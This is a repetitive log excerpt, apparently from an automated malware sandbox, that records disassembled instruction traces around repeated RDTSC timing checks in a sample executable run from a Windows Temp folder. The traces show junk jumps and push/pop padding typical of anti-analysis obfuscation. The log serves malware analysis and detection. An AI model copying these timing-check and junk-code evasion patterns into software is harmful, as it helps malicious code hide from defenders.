Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53900DC second address: 539011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F34D8F44CBBh 0x0000000b sub ch, FFFFFFBEh 0x0000000e jmp 00007F34D8F44CC9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F34D8F44CBDh 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0E69 second address: 53C0E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0E6D second address: 53C0E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0E85 second address: 53C0EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F34D94219E6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov esi, 577D452Fh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0EB8 second address: 53C0ED6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53600ED second address: 536012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F34D94219DDh 0x0000000b and esi, 0DF073E6h 0x00000011 jmp 00007F34D94219E1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F34D94219DDh 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536012D second address: 5360133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360133 second address: 5360137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360137 second address: 536013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536013B second address: 536016D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, 484073F7h 0x00000013 pushfd 0x00000014 jmp 00007F34D94219DCh 0x00000019 sbb si, C9E8h 0x0000001e jmp 00007F34D94219DBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536016D second address: 5360173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360173 second address: 5360177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380CA4 second address: 5380CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F34D8F44CC0h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380CC8 second address: 5380CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380CD7 second address: 5380CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F34D8F44CBFh 0x00000008 push eax 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov si, di 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380CF6 second address: 5380D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 jmp 00007F34D94219DFh 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F34D94219E5h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380D25 second address: 5380D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CBCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380D35 second address: 5380D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F34D94219E8h 0x00000011 jmp 00007F34D94219E2h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380865 second address: 5380869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380869 second address: 538086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 538086F second address: 5380885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380885 second address: 53808F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F34D94219E6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F34D94219E1h 0x00000019 and ah, FFFFFF86h 0x0000001c jmp 00007F34D94219E1h 0x00000021 popfd 0x00000022 mov ch, 5Ch 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F34D94219E6h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53807B6 second address: 5380833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D8F44CBFh 0x00000009 jmp 00007F34D8F44CC3h 0x0000000e popfd 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 jmp 00007F34D8F44CC0h 0x0000001b mov dword ptr [esp], ebp 0x0000001e jmp 00007F34D8F44CC0h 0x00000023 mov ebp, esp 0x00000025 jmp 00007F34D8F44CC0h 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F34D8F44CC7h 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380590 second address: 5380594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380594 second address: 53805B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390392 second address: 53903AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53903AB second address: 53903B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0D93 second address: 53C0E0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D94219DFh 0x00000009 sub eax, 3D21896Eh 0x0000000f jmp 00007F34D94219E9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F34D94219E0h 0x0000001b jmp 00007F34D94219E5h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 jmp 00007F34D94219E1h 0x0000002a xchg eax, ebp 0x0000002b pushad 0x0000002c push eax 0x0000002d pushad 0x0000002e popad 0x0000002f pop ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 mov eax, 29D0CFDBh 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0E0F second address: 53C0E4D instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov si, 9DAFh 0x0000000f pushad 0x00000010 mov si, F4C1h 0x00000014 jmp 00007F34D8F44CBEh 0x00000019 popad 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F34D8F44CC7h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0E4D second address: 53C0E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A03E9 second address: 53A03EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A03EF second address: 53A0406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219E3h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0406 second address: 53A042D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ax, 3469h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A042D second address: 53A0495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F34D94219E4h 0x0000000c and ax, EF38h 0x00000011 jmp 00007F34D94219DBh 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a call 00007F34D94219DFh 0x0000001f mov edi, esi 0x00000021 pop esi 0x00000022 pushad 0x00000023 mov eax, ebx 0x00000025 call 00007F34D94219E7h 0x0000002a pop esi 0x0000002b popad 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov ebx, 134150C2h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0495 second address: 53A0505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F34D8F44CC0h 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 jmp 00007F34D8F44CC0h 0x00000018 and dword ptr [eax], 00000000h 0x0000001b pushad 0x0000001c jmp 00007F34D8F44CBEh 0x00000021 mov di, ax 0x00000024 popad 0x00000025 and dword ptr [eax+04h], 00000000h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F34D8F44CC3h 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0505 second address: 53A0521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 803Ah 0x00000007 jmp 00007F34D94219DBh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0521 second address: 53A0525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0525 second address: 53A052B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A052B second address: 53A0531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0531 second address: 53A0535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0535 second address: 53A0539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53806DE second address: 53806E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53806E4 second address: 538070C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F34D8F44CC4h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 538070C second address: 5380726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380726 second address: 538072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 538072A second address: 538072E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 538072E second address: 5380734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380734 second address: 538073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 538073A second address: 538073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390ED3 second address: 5390EEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219E4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390EEB second address: 5390EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390EEF second address: 5390F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F34D94219E7h 0x0000000f pop ebp 0x00000010 pushad 0x00000011 call 00007F34D94219E4h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0233 second address: 53A0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0237 second address: 53A023B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A023B second address: 53A0241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0241 second address: 53A0247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0247 second address: 53A0281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e mov ebx, 37F9ED46h 0x00000013 pop edx 0x00000014 mov cl, D0h 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F34D8F44CC0h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0281 second address: 53A0285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0285 second address: 53A028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A028B second address: 53A029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219DDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A029C second address: 53A02D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F34D8F44CBCh 0x00000012 mov edx, ecx 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 jmp 00007F34D8F44CBCh 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A02D9 second address: 53A02DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A02DD second address: 53A02E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A02E3 second address: 53A02E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C065B second address: 53C066F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC0h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C066F second address: 53C0721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F34D94219E6h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov ebx, 6EF02304h 0x00000018 pushad 0x00000019 call 00007F34D94219E3h 0x0000001e pop esi 0x0000001f pushfd 0x00000020 jmp 00007F34D94219E9h 0x00000025 adc ch, FFFFFFA6h 0x00000028 jmp 00007F34D94219E1h 0x0000002d popfd 0x0000002e popad 0x0000002f popad 0x00000030 xchg eax, ecx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F34D94219DCh 0x00000038 or ecx, 2665AD48h 0x0000003e jmp 00007F34D94219DBh 0x00000043 popfd 0x00000044 movzx esi, bx 0x00000047 popad 0x00000048 mov eax, dword ptr [76FB65FCh] 0x0000004d jmp 00007F34D94219DBh 0x00000052 test eax, eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0721 second address: 53C0725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0725 second address: 53C0729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0729 second address: 53C072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C072F second address: 53C07CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F354AF94BFFh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F34D94219DEh 0x00000016 adc al, 00000008h 0x00000019 jmp 00007F34D94219DBh 0x0000001e popfd 0x0000001f movzx esi, di 0x00000022 popad 0x00000023 mov ecx, eax 0x00000025 jmp 00007F34D94219DBh 0x0000002a xor eax, dword ptr [ebp+08h] 0x0000002d jmp 00007F34D94219DFh 0x00000032 and ecx, 1Fh 0x00000035 jmp 00007F34D94219E6h 0x0000003a ror eax, cl 0x0000003c jmp 00007F34D94219E0h 0x00000041 leave 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F34D94219E7h 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C07CA second address: 53C081D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00A72014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007F34DD8D54D0h 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007F34D8F44CBEh 0x0000002b pop eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F34D8F44CBCh 0x00000035 or esi, 7CAE6DE8h 0x0000003b jmp 00007F34D8F44CBBh 0x00000040 popfd 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C081D second address: 53C08A2 instructions: 0x00000000 rdtsc 0x00000002 call 00007F34D94219E8h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F34D94219DBh 0x0000000f call 00007F34D94219E8h 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 ret 0x00000018 nop 0x00000019 push eax 0x0000001a call 00007F34DDDB2260h 0x0000001f mov edi, edi 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F34D94219DCh 0x00000028 jmp 00007F34D94219E5h 0x0000002d popfd 0x0000002e movzx eax, di 0x00000031 popad 0x00000032 push esp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F34D94219E2h 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C08A2 second address: 53C08A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C08A6 second address: 53C08AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
